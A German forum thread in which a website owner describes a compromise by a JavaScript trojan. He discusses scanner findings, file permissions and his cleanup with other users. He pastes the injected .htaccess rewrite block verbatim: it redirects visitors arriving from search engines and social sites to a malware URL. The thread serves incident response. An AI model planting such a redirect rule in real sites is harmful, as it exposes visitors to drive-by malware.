Trojaner und Exploit auf meiner Website

[Lobbi]

Hallo zusammen. Habe ein dickes Problem mit meiner Website.
Mein Bruder für den ich die Seiten verwalte rief mich heute an das sein Avast Scanner beim aufrufen der Seite meckert.
Hab mich gleich dahintergeklemmt was da los ist.
Google hat sogar die Seite gesperrt. Jedenfalls wenn ich bei Google nach der Seite suche und auf den Link klicke wird diese Adresse:
bnbhawaii.com/images/counter.php aufgerufen. dort steht dann nur ein OK oben links.

Habe erstmal die kompletten Seiten bzw Dateien runtergeladen und gescannt.
Bei den .js Dateien im Ordner \admin\edit_area\langs\ findet er den Exploit:JS/Coolex.D
in den .js Dateien im Ordner \admin\edit_area\ und in der Index.php findet er den Trojan:JS/BlacoleRef.CZ

Habe jetzt erstmal ein Backup eingespielt. habe auch gesehen das die Dateirechte auf 766 standen. hab sie wie in der Anleitung auf 666 umgestellt.
Könnte das vieleicht das Einfallstor gewesen sein.

würde mich über eure Hilfe sehr freuen.

[Lobbi]

kleiner Nachtrag.
meine .htaccess wurde geändert. Dort war eine 301 Weiterleitung zu der Adresse die ich bereits gepostet habe.

folgendes stand drin:

Code Auswählen Erweitern


#bf760a#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://bnbhawaii.com/images/counter.php [R=301,L]
</IfModule>

[stefanbe]

sieht nach dem aus
http://www.mozilo.de/forum/index.php/topic,3326.msg15952.html

lg stefanbe

[laborix]

Deine eigene Website ist auch infiziert mit dem JS-Trojaner. Der ist übrigens 3 Tage alt und nicht jeder Virenschutz findet diesen zur Zeit.

Die Frage ist wie kommt der da rein?

[Lobbi]

Habe jetzt diesen JS-Code gefunden.
Habe alle Dateien gesucht die diesen Code enthielten und ihn entfernt.
Waren alles .php Dateien.
Am Anfang und am Ende des JS-Codes stand immer:

Code Auswählen Erweitern

#bf760a#

alle betroffenen Dateien hatten das gleiche Änderungsdatum und Zeit.
Das ist mir aufgefallen denn ich wusste das ich da garkeine Änderungen gemacht hatte.

Mein eigener Rechner ist Clean. Dateien auf dem Server (bei 1und1) auch wieder Clean.
ftp und Admin passwort vom CMS geändert.

Mal schauen ob noch was kommt.

[stefanbe]

Deine eigene Website ist auch infiziert mit dem JS-Trojaner. Der ist übrigens 3 Tage alt und nicht jeder Virenschutz findet diesen zur Zeit.

Wen meinst du mit "Deine"?

In meinen Augen ist das ein Provider Problemm und hat nichts mit mozilo zu tun

lg stefanbe

[laborix]

Mit "Deine" war "Lobbi" gemeint. Sorry der nicht eindeutigen Beschreibung.

Zum Exploid, wenn man mit dem Web Browser auf diese Website gesurft ist, schlug mein Schutzprogramm zu. Ich wurde darauf hingewiesen, dass diese Website Schadcode enthält. Also gleich abgebrochen und den Anweisungen meines Schutzprogrammes gefolgt.

Danach habe ich den Hinweis oben gepostet.

[Lobbi]

Mein Schutzprogramm schlug auch an.
Achso Meine Webseite ist die die ich meine.
Mittlerweile ist alles Clean. Onlinescanner meckert auch nichtmehr.

Kann mir nur nicht vorstellen wie sowas passieren kann. geht doch nur wenn auf dem Server auch andere Webseiten laufen
und die Inhaber dann damit irgendwelchen Mist machen.